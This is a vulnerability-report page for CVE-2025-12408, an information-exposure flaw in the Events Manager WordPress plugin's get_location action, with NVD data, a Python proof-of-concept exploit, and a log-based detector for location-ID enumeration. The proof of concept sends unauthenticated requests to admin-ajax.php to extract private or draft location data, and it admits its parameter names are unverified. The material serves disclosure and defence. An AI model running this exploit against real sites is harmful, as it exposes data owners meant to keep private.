Security Vulnerability Report
CVE-2025-12408 CVSS 5.3 MEDIUM

CVE-2025-12408

Published: 2025-12-12 12:15:46
Last Modified: 2026-04-15 00:35:42

Description

The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 7.2.2.2 via the 'get_location' action due to insufficient restrictions on which locations can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft event locations that they should not have access to.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Weakness
CWE-200 (Information Exposure)

Configurations (Affected Products)

No configuration data available.

Events Manager WordPress plugin <= 7.2.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-12408 PoC - Events Manager Plugin Information Disclosure
Target: WordPress with Events Manager plugin <= 7.2.2.2
Vulnerability: Insufficient access control on the get_location action
"""
import re
import sys

import requests


def extract_csrf_token(html):
    """Extract a WordPress AJAX nonce from page HTML, or None if absent.

    poc_exploit() does not call this: the request below needs no nonce.
    """
    match = re.search(r'name="_wpnonce_ajax" value="([a-f0-9]+)"', html)
    if match:
        return match.group(1)
    # Alternative pattern for other nonce field names
    match = re.search(r'_wpnonce[^"]*" value="([^"]+)"', html)
    return match.group(1) if match else None


def poc_exploit(target_url, event_id=1):
    """Request a location through the get_location action without authenticating."""
    print(f"[*] Target: {target_url}")
    print(f"[*] Testing event ID: {event_id}")

    # Step 1: a bare session is enough; no login, cookie or nonce is obtained
    session = requests.Session()

    # Step 2: send the request to the get_location action. In versions
    # <= 7.2.2.2 the action does not restrict which locations it will return.
    exploit_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    # Parameter names as used by this PoC; confirm them against the fix
    # changeset in em-actions.php (see References) before relying on them.
    data = {
        'action': 'get_location',
        'em_obj': event_id,
        'scope': 'location',
    }
    print("[*] Sending exploit request...")
    try:
        response = session.post(exploit_url, data=data, timeout=10)
    except requests.RequestException as exc:
        print(f"[-] Request error: {exc}")
        return False

    # Step 3: analyze the response. admin-ajax.php answers a bare "0" when no
    # handler ran, so a very short body means nothing was returned. A longer
    # body only suggests exposure; confirm it by looking for fields of a
    # location you know to be draft, private or password protected.
    if response.status_code != 200:
        print(f"[-] Request failed with status: {response.status_code}")
        return False
    print(f"[+] Response Status: {response.status_code}")
    print(f"[+] Response Content-Type: {response.headers.get('Content-Type', 'N/A')}")
    if response.text and len(response.text) > 10:
        print("[+] Potential vulnerability confirmed!")
        print(f"[+] Response length: {len(response.text)} bytes")
        print("\n[+] Response preview:")
        print(response.text[:500])
        return True
    print("[-] No data leaked (empty response)")
    return False


def main():
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-12408-poc.py <target_url> [event_id]")
        print("Example: python3 cve-2025-12408-poc.py https://example.com 1")
        sys.exit(1)
    target = sys.argv[1]
    event_id = int(sys.argv[2]) if len(sys.argv) > 2 else 1
    poc_exploit(target, event_id)


if __name__ == "__main__":
    main()
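Detection side, as an added example that is neither part of this advisory nor code from the Events Manager plugin: a log-triage script that flags clients walking location IDs through the get_location action in a combined-format web-server access log. It assumes the request shape used by the PoC above with the parameters in the query string (POST bodies do not appear in a standard access log; feed WAF or request-body logs for those). The sample log lines are constructed, and the em_obj and scope parameter names are taken from the PoC rather than verified against the plugin, which is why the detector keys on the whole parameter set instead of one parameter name.

```python
#!/usr/bin/env python3
"""Flag clients enumerating Events Manager locations via the get_location
action in a combined-format (Apache/nginx) access log."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Combined format: ip ident user [ts] "METHOD target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log, not real traffic. 203.0.113.7 walks location ids;
# 198.51.100.20 makes one lookup while browsing. The em_obj/scope names are
# an assumption copied from the PoC; only action=get_location is decisive.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2025:13:01:10 +0000] "GET /wp-admin/admin-ajax.php?action=get_location&em_obj=1&scope=location HTTP/1.1" 200 812 "-" "python-requests/2.32.3"
203.0.113.7 - - [12/Dec/2025:13:01:11 +0000] "GET /wp-admin/admin-ajax.php?action=get_location&em_obj=2&scope=location HTTP/1.1" 200 790 "-" "python-requests/2.32.3"
203.0.113.7 - - [12/Dec/2025:13:01:11 +0000] "GET /wp-admin/admin-ajax.php?action=get_location&em_obj=3&scope=location HTTP/1.1" 200 1 "-" "python-requests/2.32.3"
203.0.113.7 - - [12/Dec/2025:13:01:12 +0000] "GET /wp-admin/admin-ajax.php?action=get_location&em_obj=4&scope=location HTTP/1.1" 200 951 "-" "python-requests/2.32.3"
198.51.100.20 - - [12/Dec/2025:13:02:00 +0000] "GET /events/ HTTP/1.1" 200 15230 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Dec/2025:13:02:05 +0000] "GET /wp-admin/admin-ajax.php?action=get_location&em_obj=1&scope=location HTTP/1.1" 200 812 "https://example.test/events/" "Mozilla/5.0"
not a log line at all
"""


def parse_line(line):
    """Return ip, method, path, query (dict of lists), status and size, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "method": m.group("method"),
        "path": parts.path,
        "query": parse_qs(parts.query),
        "status": int(m.group("status")),
        "size": 0 if m.group("size") == "-" else int(m.group("size")),
    }


def is_get_location(rec):
    """True when the request carries action=get_location in its query string.

    The path is deliberately not pinned to admin-ajax.php, so the same
    action reached through another front-end URL is still counted.
    """
    return rec["query"].get("action", [None])[0] == "get_location"


def find_enumerators(log_text, threshold=3):
    """Map client IP -> number of distinct get_location requests, keeping only
    clients at or above `threshold`. One lookup from a page load is normal;
    a run of distinct parameter sets from one client is id enumeration."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_get_location(rec):
            continue
        # Key on the full parameter set so the detector does not depend on
        # which parameter name carries the location id.
        key = tuple(sorted((k, tuple(v)) for k, v in rec["query"].items()))
        seen[rec["ip"]].add(key)
    return {ip: len(keys) for ip, keys in seen.items() if len(keys) >= threshold}


def main():
    for ip, n in sorted(find_enumerators(SAMPLE_LOG).items()):
        print(f"{ip}: {n} distinct get_location requests")


if __name__ == "__main__":
    main()
```

Pipe a real log through `find_enumerators(open(path).read())` and tune `threshold` to the site's normal per-client rate; a hit is worth correlating with the responses' sizes, since the page's own PoC treats any non-trivial body as leaked location data.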

References

https://plugins.trac.wordpress.org/changeset/3392395/events-manager/trunk/em-actions.php (fix changeset in em-actions.php)
https://www.wordfence.com/threat-intel/vulnerabilities/id/8470b7be-6fae-4941-b523-93e230366522?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12408", "sourceIdentifier": "[email protected]", "published": "2025-12-12T12:15:45.587", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 7.2.2.2 via the 'get_location' action due to insufficient restrictions on which locations can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft event locations that they should not have access to."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3392395/events-manager/trunk/em-actions.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8470b7be-6fae-4941-b523-93e230366522?source=cve", "source": "[email protected]"}]}}